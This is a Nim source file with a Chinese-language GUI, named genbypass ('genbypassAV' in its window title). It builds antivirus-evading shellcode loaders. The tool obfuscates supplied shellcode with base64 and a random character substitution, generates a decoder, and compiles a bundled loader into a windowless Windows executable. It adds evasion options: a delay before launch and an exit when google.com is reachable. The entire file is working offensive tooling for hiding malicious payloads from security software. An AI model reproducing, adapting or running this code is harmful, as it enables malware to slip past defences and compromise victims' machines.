# 生成bypass

import base64
import strutils
import strformat
import random
import os

import argparse
import nigui

randomize()
app.init()

const used_enc_chars = ":;<>?[]^-_{}$&#"
const base64_table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

proc shuffleCount(s : string, l : int) : string =
  var r = s
  shuffle(r)
  r.substr(0, l)

proc gen_shell_exe(shellcode: string, sleep = 0, use_google = false): bool =
  let
    shellcode = shellcode.strip().unescape(prefix="", suffix="")
    replace_count = rand(3 .. len(used_enc_chars))
    to_chars = shuffleCount(used_enc_chars, replace_count)
    from_chars = shuffleCount(base64_table, replace_count)
  echo fmt"shellcode len {len(shellcode)}"
  echo fmt"replace {replace_count} times."
  var
    enc_code : string = shellcode.encode()
    dec_code : string = ""
  for i in 0 ..< replace_count:
    let fromc = from_chars[i]
    let toc = to_chars[i]
    echo fmt"replace {fromc} to {toc}"
    dec_code.add fmt""".replace("{toc}", "{fromc}")"""
    enc_code = replace(enc_code, fromc, toc)
  echo fmt"use google: {use_google}"
  let check_google = if use_google: """
import net

proc checkEnv() =
  try:
    discard dial("google.com", Port(80))
    quit()
  except:
    discard
"""
                     else: """
proc checkEnv() =
  discard
"""
  let sleep_time = sleep * 1000
  echo "sleep:", sleep_time
  let gen_result = fmt"""
# generated by genbypass
import base64
import strutils
{check_google}

proc codeDecode(s : string) : string =
  s{dec_code}.decode()

let wait_time = {sleep_time}

let codes = "{enc_code}"

"""
  echo "save bytes.nim"
  writeFile("bytes.nim", gen_result)
  #test encode
  let test_encode = fmt"""
include bytes
let org_codes = {escape(shellcode)}

assert org_codes == codeDecode(codes)
echo "test shellcode decode ok!"
"""
  writeFile("bytes_test.nim", test_encode)
  const bypass_code =  slurp("../resources/bypass.nim")
  writeFile("bypass.nim", bypass_code)
  if findExe("nim") == "":
    echo "can't find nim exe, please install nim and gcc compiler."
    return false
  echo "test shellcode decode..."
  discard execShellCmd("nim c -r bytes_test.nim")
  echo "building bypass.exe:"
  if defined(windows):
    discard execShellCmd("nim c -d:release -d:mingw --cpu:amd64 -d:danger --app:gui bypass.nim")
  else:
    discard execShellCmd("nim c -d:release -d:danger --app:gui bypass.nim")
  return true

proc show_gui() =
  var
    window = newWindow("genbypassAV")
    container = newLayoutContainer(Layout_Vertical)
    gen_btn = newButton("生成")
    use_google_cb = newCheckbox("检测google")
    sleep_text = newTextBox("180")
    shell_text = newTextArea()
    head_check_line = newLayoutContainer(Layout_Horizontal)
    code_line = newLayoutContainer(Layout_Vertical)
  window.add(container)
  container.heightMode = HeightMode_Fill
  head_check_line.frame = newFrame("设置项：")
  head_check_line.add(use_google_cb)
  head_check_line.add(newLabel("           Sleep(s):"))
  head_check_line.add(sleep_text)
  head_check_line.yAlign = YAlign_Center
  head_check_line.heightMode = HeightMode_Auto
  container.add(head_check_line)
  code_line.frame = newFrame("shellcode:")
  code_line.add(shell_text)
  container.add(code_line)
  gen_btn.widthMode = WidthMode_Fill
  container.add(gen_btn)
  gen_btn.onClick = proc(event: ClickEvent) =
    if findExe("nim") == "":
      alert(nil, "需要安装mingw与nim编译器", "错误")
      return
    var
      sleep_s = 0
      shellcode = shell_text.text().strip()
    try:
      sleep_s = parseInt(sleep_text.text())
    except:
      alert(nil, "sleep必须为整数，指定启动shellcode前的休眠时间" ,"sleep参数错误")
    if shellcode.isEmptyOrWhitespace():
      alert(nil, "shellcode不能为空", "shellcode错误")
    else:
      if gen_shell_exe(shellcode,
                       sleep = sleep_s,
                       use_google = use_google_cb.checked()):
        alert(nil, "生成完毕", "shellcode")
      else:
        alert(nil, "生成失败!", "shellcode")
  window.show()
  app.run()

if isMainModule:
  var
    p = newParser("genbypass"):
      help("generate bypass code")
      option("-f", "--file", help="input shell code file, hex string format")
      flag("-c", "--clipboard", help="get shell code from clipboard")
      flag("-g", "--google", help="if host can connect google, then quit.")
      flag("-i", "--from_stdin", help="get shell code from stdin")
      option("-s", "--sleep", help="sleep x seconds then start shellcode.", default="180")
    opts = p.parse(commandLineParams())
    input_code = if opts.clipboard:
                   app.clipboardText()
                 elif opts.file != "":
                   readFile(opts.file)
                 elif opts.help:
                   quit()
                 elif opts.from_stdin:
                   echo "Enter shell code hex:"
                   readLine(stdin)
                 else:
                   show_gui()
                   quit()

  discard gen_shell_exe(input_code,
                        use_google = opts.google,
                        sleep = parseInt(opts.sleep))

